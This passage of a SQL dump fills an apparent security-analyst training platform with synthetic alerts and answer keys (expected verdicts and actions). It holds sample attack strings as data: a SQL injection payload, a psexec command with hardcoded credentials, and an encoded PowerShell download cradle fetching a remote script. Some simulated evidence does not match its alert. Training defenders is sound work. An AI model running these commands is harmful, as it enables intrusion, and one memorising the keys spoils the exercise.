Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1705, 'Process Hollowing Detected in Explorer.exe', 'high', 'SentinelOne', 'Anomalous process behavior detected. Explorer.exe is exhibiting process hollowing behavior, which is commonly associated with malware.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:50:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"WORKSTATION-22\",\"command_line\":\"explorer.exe\",\"file_hash\":\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious process hollowing activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and process behavior are indicative of process hollowing, a technique used by malware to hide malicious activity.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1706, 'Suspicious PowerShell Execution', 'medium', 'Carbon Black', 'A PowerShell script executed with suspicious parameters, potentially indicating an attempt to download or execute unauthorized content.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"mbrown\",\"hostname\":\"DEV-SERVER-01\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the development server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution with bypass policy is suspicious but common in legitimate scripts\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution policy bypass is common during legitimate script testing on development servers.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File 
script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1707, 'Web Request with SQL Injection Payload', 'critical', 'Sysmon', 'Detected an incoming web request containing a SQL injection payload targeting a vulnerable URL.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:05:22Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.20\",\"username\":\"\",\"hostname\":\"\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"patch_vulnerability\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL injection payload indicates a direct attempt to exploit database vulnerabilities, requiring immediate intervention.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' 
--\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1708, 'Unusual Internal Lateral Movement Detected', 'high', 'CrowdStrike', 'Detected lateral movement within the network using PSExec, possibly indicating a compromised internal account.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-14T23:30:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"192.168.1.40\",\"username\":\"jdoe\",\"hostname\":\"CORP-SRV-03\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.40 -u admin -p password cmd\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the source machine initiating PSExec\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.40 -u admin -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of PSExec with hardcoded credentials indicating potential lateral movement\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with hardcoded credentials for lateral movement is a strong indicator of malicious internal activity.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1709, 'Malicious Email URL Detected', 'medium', 'Proofpoint', 'An email was received containing a URL known to host phishing content, targeting the recipient to steal credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:45:11Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.45\",\"dst_ip\":\"\",\"username\":\"j.smith@example.com\",\"hostname\":\"\",\"email_sender\":\"fraudulent@phishingsite.com\",\"url\":\"http://malicious-url.com/login\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"fraudulent@phishingsite.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing content aimed at credential harvesting\"}}],\"expected_actions\":[\"block_url\",\"alert_user\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL and sender email are both indicative of a phishing attempt, requiring immediate action to prevent credential theft.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email URL Detected\",\"date\":\"2026-03-15T20:58:16.051Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1710, 'Failed Login Attempts from Foreign IP Address', 'medium', 'Firewall', 'Multiple failed login attempts detected from an external IP address, potentially indicating a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T04:20:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.5\",\"username\":\"admin\",\"hostname\":\"MAIL-SERVER\",\"failed_attempts\":5}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP listed for suspicious activity, but not confirmed for malicious intent\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the mail server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in login attempts\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Five failures against the generic admin account from a single external IP are consistent with routine internet scanning noise or a remote user mistyping a password rather than a targeted attack. Before closing, confirm that no successful authentication from 203.0.113.50 followed the failures and that the account was not locked out, and reopen the alert if the attempt count keeps climbing.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1711, 'PowerShell Download Cradle with Encoded Script Execution', 'critical', 'CrowdStrike', 'A PowerShell download cradle was detected executing an encoded script from a suspicious external IP, indicating a potential malware attack.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"WORKSTATION-01\",\"command_line\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24gJ2h0dHBzOi8vZXhhbXBsZS5jb20vc2NyaXB0LnBzMSc=\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24gJ2h0dHBzOi8vZXhhbXBsZS5jb20vc2NyaXB0LnBzMSc=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command execution from a known malicious IP indicates a true positive malware incident.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1712, 'Suspicious Process Hollowing Detected in explorer.exe', 'high', 'SentinelOne', 'Process hollowing detected within explorer.exe, potentially indicating a sophisticated malware attempt to evade detection.', 'Malware', 'T1055.012', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"mjohnson\",\"hostname\":\"LAPTOP-02\",\"command_line\":\"explorer.exe hollowed_process.exe\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"hollowed_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File associated with malware variants\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"explorer.exe hollowed_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique used to evade detection\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of process hollowing in explorer.exe is a strong indicator of malware attempting to evade standard detection mechanisms.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe 